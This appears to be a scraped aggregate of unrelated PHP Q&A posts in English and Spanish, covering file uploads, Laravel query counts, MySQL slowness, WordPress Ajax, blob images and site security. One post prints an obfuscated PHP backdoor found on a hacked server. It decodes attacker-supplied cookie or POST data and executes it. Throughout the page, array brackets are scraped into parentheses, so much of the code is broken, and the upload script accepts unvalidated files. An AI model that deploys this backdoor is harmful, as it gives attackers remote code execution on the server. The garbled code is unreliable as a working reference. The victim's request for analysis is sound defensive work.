web hosting – Why doesn’t my HTML PHP file upload form work on my website?

I have an HTML PHP website hosted on SiteGround, which I read somewhere uses UNIX servers. I created a file upload form for a job application webpage and I’ve tried every code example that I found online (that works for them but obviously not for me).

I even changed the folder and file permissions. Yet I still cannot manage to upload a simple PNG image file in testing. The tutorials and examples that I’ve found online are somewhat outdated.

Here is the code for the form.html file:

<!DOCTYPE html>
<html>
<body>
<form enctype="multipart/form-data" action="upload.php" method="post">
<p>Upload your file:</p>
<input type="file" name="uploaded_file">
<input type="submit" value="Upload">
</form>
</body>
</html>

Here is the code for the upload.php file:

<?php
$target_dir = "uploads/";
$target_file = $target_dir . basename($_FILES('uploaded_file')('name'));
if(move_uploaded_file($_FILES('uploaded_file')('tmp_name'),$path)){
    echo "The file ".  basename($_FILES('uploaded_file')('name')). " has been uploaded";
}
else{
    echo "Your file was unable to upload. Please try again.";
$uploadOk = 0;
}
?>

I do have a folder named “uploads” in the same directory on the server.

php – I’ve heard the opinion that my code is making too many database queries

I’ve heard the opinion that my code is making too many database queries. Probably needs to move some code before sending the request, but I don’t know how.

        $this->data('reviews') = Review::query()
        ->orderBy("id", 'desc')
        ->whereNotNull('published_at')
        ->with('answers')
        ->withCount((
            'likes as likesCount' => function (Builder $builder) {
                $builder
                    ->where('rating', AppReviewQuestionLike::LIKE);
            },
            'likes as dislikesCount' => function (Builder $builder) {
                $builder
                    ->where('rating', AppReviewQuestionLike::DISLIKE);
            },
        ))
        ->get()
        ->map(function (Review $review) {
            $customer_name = $review->customer->firstname . ' ' . mb_strimwidth($review->customer->lastname, 0, 2, '.');
            $anonymous_name = $review->anonymous == true ? 'ANONIM' : $customer_name;

            return (
                
                'id' => $review->id,
                'customer_id' => $review->customer->id,
                
                'customer_name' => $anonymous_name,
                'recommendation' => $review->recommendation,
                'rating' => $review->rating,
                'advantages' => $review->advantages,
                'flaws' => $review->flaws,
                'text' => $review->text,
                'type' => 'review',
                'product' => $review->product->title,
                'created_at' => $review->created_at->format('d-m-Y'),
                'likesCount' => $review->likesCount,
                'dislikesCount' => $review->dislikesCount,
                'answers' => $review->answers
                    ->whereNotNull('published_at')
                    ->map(function (Answer $answer) {
                        $customer_answer = $answer->customer->firstname . ' ' . mb_strimwidth($answer->customer->lastname, 0, 2, '.');
                        $anonymous_answer = $answer->anonymous == true ? 'ANONIM' : $customer_answer;

                        /** @var Review $interlocutor_message */
                        $interlocutor_message = Review::query()->find($answer->model_id);
                        $interlocutor = $interlocutor_message->customer->firstname . ' ' . mb_strimwidth($interlocutor_message->customer->lastname, 0, 2, '.');
                        $interlocutor_name = $interlocutor_message->anonymous == true ? 'ANONIM' : $interlocutor;
                        $interlocutor_prefix_message_id = 'review_';

                        return (
                            
                            'id' => $answer->id,
                            'customer_id' => $answer->customer->id,
                            
                            'customer_name' => $anonymous_answer,
                            'interlocutor_message_id' => $interlocutor_prefix_message_id . $answer->model_id,
                            'interlocutor_name' => $interlocutor_name,
                            'text' => $answer->text,
                            'type' => 'answer',
                            'created_at' => $answer->created_at->format('d-m-Y'),
                            'likesCount' => count($answer->likes->where('rating', AppReviewQuestionLike::LIKE)),
                            'dislikesCount' => count($answer->likes->where('rating', AppReviewQuestionLike::DISLIKE)),
                            'comments' => $answer->comments
                                ->whereNotNull('published_at')
                                ->map(function (AnswerComment $comment) {
                                    $customer_comment = $comment->customer->firstname . ' ' . mb_strimwidth($comment->customer->lastname, 0, 2, '.');
                                    $anonymous_comment = $comment->anonymous == true ? 'ANONIM' : $customer_comment;
                                    if ($comment->model_type == 'AppAnswer') {
                                        /** @var Answer $interlocutor_message */
                                        $interlocutor_message = Answer::query()->find($comment->model_id);
                                        $interlocutor = $interlocutor_message->customer->firstname . ' ' . mb_strimwidth($interlocutor_message->customer->lastname, 0, 2, '.');
                                        $interlocutor_name = $interlocutor_message->anonymous == true ? 'ANONIM' : $interlocutor;
                                        $interlocutor_prefix_message_id = 'answer_';
                                    }
                                    if ($comment->model_type == 'AppAnswerComment') {
                                        /** @var AnswerComment $interlocutor_message */
                                        $interlocutor_message = AnswerComment::query()->find($comment->model_id);
                                        $interlocutor = $interlocutor_message->customer->firstname . ' ' . mb_strimwidth($interlocutor_message->customer->lastname, 0, 2, '.');
                                        $interlocutor_name = $interlocutor_message->anonymous == true ? 'ANONIM' : $interlocutor;
                                        $interlocutor_prefix_message_id = 'comment_';
                                    }

                                    return (
                                        
                                        'id' => $comment->id,
                                        'customer_id' => $comment->customer->id,
                                        'answer_id' => $comment->answer_id,
                                        
                                        'interlocutor_message_id' => $interlocutor_prefix_message_id . $comment->model_id,
                                        'interlocutor_name' => $interlocutor_name,
                                        'customer_name' => $anonymous_comment,
                                        'text' => $comment->text,
                                        'type' => 'comment',
                                        'likesCount' => count($comment->likes->where('rating', AppReviewQuestionLike::LIKE)),
                                        'dislikesCount' => count($comment->likes->where('rating', AppReviewQuestionLike::DISLIKE)),
                                        'created_at' => $comment->created_at->format('d-m-Y'),
                                    );
                                })->toArray(),
                        );
                    })->toArray(),
            );
        })->toArray();

How to speed up queries for 2m Datasets in PHP & Mysql

We have a SaaS Application site, where we would have over 2M records in a table.

Even with the indexes these queries are slow.

My Question:

  1. Our Database query response in very slow in our PHP User Table Page. takes more than 4-5 mins to fetch the data. How can we improve the response time.
  2. Our login page also respond slow to authenticate the user? How can we improve the performance?
  3. Isn’t our server good enough. Here is our specs (Dedicated Server XL6 managed. CPU. AMD Hexa-Core. 6 Cores x 2.8 GHz. (3.3 GHz Turbo Core). RAM. 16 GB. DDR3 ECC. HDD. 1,000 GB (2 x 1,000 SATA))

4.Would separating this table/data unto another database on a server
that has enough ram to store this data in memory would this speed up
these queries? Is there anything in anyway that the tables/indexes
are set up that we can improve upon to make these queries faster?

Table Structure

MySQL Table Information

Data    102.9   MiB
Index   10.2    MiB
Overhead    380 B
Effective   113.1   MiB
Total   113.1   MiB

Row statistics
Format  dynamic
Collation   latin1_swedish_ci
Rows    1,034,964
Row length  104 B
Row size    115 B

Simplify function to blend HTML into PHP

I’m always down to learn better ways of doing thing and I wanted to see if I can get an input from the community to see if there is a way that I can improve this function:

function pardot_dashboard_query()
{
    $args = (
        's'         => '<!-- wp:acf/pardot-form ',
        'sentence'  => 1,
        'post_type' => (
            'post',
            'page'
        ),
    );
    $pardot_posts = get_posts($args);
    if (!$pardot_posts) {
        echo 'There are no active Pardot Forms.';
        return;
    }
    echo '<p>The Pardot Form is active on the following pages/posts:</p>'; ?>
    <ul>
        <?php foreach ($pardot_posts as $post): ?>
            <li><a href="<?= $post->guid ?>"><?= $post->post_title ?: 'No title available' ?><?= ' (' . ucfirst($post->post_type) . ')' ?></a></li>
        <?php endforeach; ?>
    </ul>
    <?php
}

If there are other means of outputs and or ways to shrink it down – All help will be appreciated!

Using a custom plugin to capture input data via Ajax and PHP

I’m very new to WordPress, so please excuse my possible lack of understanding. I’m super comfortable with good old vanilla HTML/JS/CSS, and transitioning my hard coded site into WP. My old site had a lot of forms that I used Ajax to send input values over to a PHP script and output a response.

After reading through this site: https://www.smashingmagazine.com/2011/10/how-to-use-ajax-in-wordpress/ I began to understand the basics of how WP likes Ajax requests to be handled. However, the only thing this article left out was how to grab user input data.

So here’s my best explanation of what I’ve tried:

Front End Facing WP Page Code

<input type="text" id="data-to-submit"/>
<?php
  /////////////////////////////////////////////////////////////////////////
  ////PHP code was added to this WP page using PHP-Everwhere plugin //////
  ///////////////////////////////////////////////////////////////////////
  $nonce = wp_create_nonce("my_nonce");
  $link = admin_url('admin-ajax.php?action=my_price_request&nonce='.$nonce);
  echo '<a id="go" data-nonce="'.$nonce.'" href="' . $link . '">Submit</a>';
?>

Then I created a new plugin by going to my cPanel file manager and going to wp-content -> plugins then creating a new folder called myFormProcessor inside this folder I added the following two files:

File #1 myFormProcessor.php

<?php
/*
Plugin Name: myFormProcessor
*/

add_action("init", "my_script_enqueuer");
add_action("wp_ajax_my_price_request", "my_price_request");

function my_price_request(){

  if(!wp_verify_nonce( $_REQUEST('nonce'), "my_nonce")) {
   exit();
}

$result('type') = 'success';
$result('data') = $_REQUEST('data');

if(!empty($_SERVER('HTTP_X_REQUESTED_WITH')) && strtolower($_SERVER('HTTP_X_REQUESTED_WITH')) == 'xmlhttprequest') {
   $result = json_encode($result);
   echo $result;
}else{
  header("Location: ".$_SERVER("HTTP_REFERER"));
}

die();
}

function my_script_enqueuer() {
   wp_register_script( "my_form_script", WP_PLUGIN_URL.'/myFormProcessor/my_form_ajax_script.js', array('jquery') );
   wp_localize_script( 'my_form_script', 'myAjax', array( 'ajaxurl' => admin_url( 'admin-ajax.php' )));        

   wp_enqueue_script('jquery');
   wp_enqueue_script('my_form_script');
}
?>

I realize the above file doesn’t really do anything. To debug this issue I’m just passing back the value I’m trying to grab from the user.

File #2 my_form_ajax_script.js

jQuery(document).ready( function() {

 jQuery("#go").click( function(e) {
  e.preventDefault(); 
  nonce = jQuery(this).attr("data-nonce");
  data = jQuery('#data-to-submit').val();  // <--- THIS IS THE VALUE I WANT TO PASS TO PHP

  jQuery.ajax({
     type : "post",
     dataType : "json",
     url : myAjax.ajaxurl,
     data : {action: "my_price_request", data : data, nonce: nonce},
     success: function(response) {
        if(response.type == "success") {
           alert(response.data);
        }else{
           alert("error occured");
        }
     },
     error: function (xhr, ajaxOptions, thrownError) {
        console.log(xhr.status);
        console.log(thrownError);
        alert('major error');
     }
  })   
 })
})

I activated the myFormProcessor plugin within WP and tested the page. Good news is most everything worked, no major errors. The only thing that didn’t work was obtaining the value from the input (id=’data-to-submit’). It’s only using the data included in the link produced in the frontend PHP. Can anyone tell me how to correct this?

php – eliminar registro con alerta de modal en la misma pagina

Buenas tardes a todos espero me puedan ayudar con este problema, resulta que tengo mi funcion que elimina registros pero al querer llamarlo en un no se como decirle que me muestre un modal de confirmacion y luego me elimine dentro de la misma pagina. aqui mi codigo

$alm = new Trabajo();
$model = new TrabajoModel();

    if(isset($_REQUEST('action')))
    {
        switch($_REQUEST('action'))
        {
            
            case 'eliminar':
                $model->Eliminar($_REQUEST('id'));
                header('Location: inicio.php');
                break;

            case 'editar':
                $alm = $model->Obtener($_REQUEST('id'));
                break;
        }
    }

aqui muestro en mi tabla el boton para eliminarlo, lo hize con javascript pero quiero que me muestre el modal y si acepto me elimine y si no me deje ahi.

<td><a href="?action=editar&id=<?php echo $dato('id'); ?>"><center><i class="fas fa-check-double"></i></center></a></td>
            <td><a onclick="return confirm('Confirma que deseas borrar este registro.');" href="?action=eliminar&id=<?php echo $dato('id'); ?>"><center><i class="far fa-trash-alt"></i></center></a></td>

wordpress – Suspicious php links found on cPanel visitors

I am facing a problem with my WordPress site. Number of visitors try to access a page that doesn’t even exist on my site. It keeps generating every minute with different random php links from different ip. I installed wordfence but those pages are not showing on wordfence traffic. By facing this my site bandwidth increasing hugely.

Please refer this screenshot.

I also facing number of ip try to access my wp-login page and xmlrpc page as well.

I don’t know where this came from and how to solve.

webserver – What does this potentially malicious php code do?

Somebody hacked my webserver and uploaded many of the following files with random names in different subdirectories of my webroot. The file looks something like this and – even though I managed to beautify it – I am unable to decipher the obfuscation.

I can see that potential code injection is happening using the $_POST and $_COOKIE variables, but what I find very interesting is the lack of any eval calls, the function is even deactivated in my php.ini.

Anyway here’s the code and I’d appreciate any kind of insights:

<?php
$wldxznb = 'r5a3m#uvplebgsH'co*6i8-_7tx14nfk0yd';
$vcekj = Array();
$vcekj() = $wldxznb(16) . $wldxznb(0) . $wldxznb(10) . $wldxznb(2) . $wldxznb(25) . $wldxznb(10) . $wldxznb(23) . $wldxznb(30) . $wldxznb(6) . $wldxznb(29) . $wldxznb(16) . $wldxznb(25) . $wldxznb(20) . $wldxznb(17) . $wldxznb(29);
$vcekj() = $wldxznb(14) . $wldxznb(18);
$vcekj() = $wldxznb(1) . $wldxznb(16) . $wldxznb(21) . $wldxznb(30) . $wldxznb(10) . $wldxznb(34) . $wldxznb(10) . $wldxznb(16) . $wldxznb(22) . $wldxznb(10) . $wldxznb(21) . $wldxznb(27) . $wldxznb(32) . $wldxznb(22) . $wldxznb(28) . $wldxznb(30) . $wldxznb(16) . $wldxznb(2) . $wldxznb(22) . $wldxznb(11) . $wldxznb(11) . $wldxznb(27) . $wldxznb(19) . $wldxznb(22) . $wldxznb(3) . $wldxznb(27) . $wldxznb(1) . $wldxznb(11) . $wldxznb(28) . $wldxznb(34) . $wldxznb(34) . $wldxznb(24) . $wldxznb(2) . $wldxznb(34) . $wldxznb(19) . $wldxznb(34);
$vcekj() = $wldxznb(5);
$vcekj() = $wldxznb(16) . $wldxznb(17) . $wldxznb(6) . $wldxznb(29) . $wldxznb(25);
$vcekj() = $wldxznb(13) . $wldxznb(25) . $wldxznb(0) . $wldxznb(23) . $wldxznb(0) . $wldxznb(10) . $wldxznb(8) . $wldxznb(10) . $wldxznb(2) . $wldxznb(25);
$vcekj() = $wldxznb(10) . $wldxznb(26) . $wldxznb(8) . $wldxznb(9) . $wldxznb(17) . $wldxznb(34) . $wldxznb(10);
$vcekj() = $wldxznb(13) . $wldxznb(6) . $wldxznb(11) . $wldxznb(13) . $wldxznb(25) . $wldxznb(0);
$vcekj() = $wldxznb(2) . $wldxznb(0) . $wldxznb(0) . $wldxznb(2) . $wldxznb(33) . $wldxznb(23) . $wldxznb(4) . $wldxznb(10) . $wldxznb(0) . $wldxznb(12) . $wldxznb(10);
$vcekj() = $wldxznb(13) . $wldxznb(25) . $wldxznb(0) . $wldxznb(9) . $wldxznb(10) . $wldxznb(29);
$vcekj() = $wldxznb(8) . $wldxznb(2) . $wldxznb(16) . $wldxznb(31);
foreach ($vcekj(8)($_COOKIE, $_POST) as $wxusr => $pjrusp)
{
    function wwdlf($vcekj, $wxusr, $qwdotr)
    {
        return $vcekj(7)($vcekj(5)($wxusr . $vcekj(2), ($qwdotr / $vcekj(9)($wxusr)) + 1) , 0, $qwdotr);
    }
    function irngfrj($vcekj, $axsex)
    {
        return @$vcekj(10)($vcekj(1), $axsex);
    }
    function vadod($vcekj, $axsex)
    {
        $onlwwe = $vcekj(4)($axsex) % 3;
        if (!$onlwwe)
        {
            $zznqw = $vcekj(0);
            $juptpoi = $zznqw("", $axsex(1)($axsex(2)));
            $juptpoi();
            exit();
        }
    }
    $pjrusp = irngfrj($vcekj, $pjrusp);
    vadod($vcekj, $vcekj(6)($vcekj(3), $pjrusp ^ wwdlf($vcekj, $wxusr, $vcekj(9)($pjrusp))));
}

php – Does adding a csv file to a wordpress plugin introduce security risks to the site?

I am currently working on an implementation reading data from a csv file from within a WordPress plugin. It was suggested the file be added within the plugin in an assets directory. I have concerns in doing this. In particular, I’m worried about security and whether this makes the site vulnerable to attacks.

That being said, I looked at the assets folder in the frontend on my local environment and was not able to see the csv file.

Does anyone know if adding a csv file directly to a plugin introduce security risks?

php – Problema para manipular blob

es mi primer pregunta aca, si algo esta mal o falta info les pido que me avisen asi lo corrijo.

Explicación:

Tengo una db donde cargo imágenes en blob y quiero pasar todas a jpeg con el nombre del id para que no sea tan pesado mostrarlas.

Actualmente es casi imposible ver la galería jajaja

Dejaría código, pero realmente no tengo.
Necesito ayuda para los blob que obtengo, pasarlos a jpeg y guardarlos en una carpeta del servidor con el nombre del id.

Si alguien me puede dar una mano, se lo agradecería.

Gracias.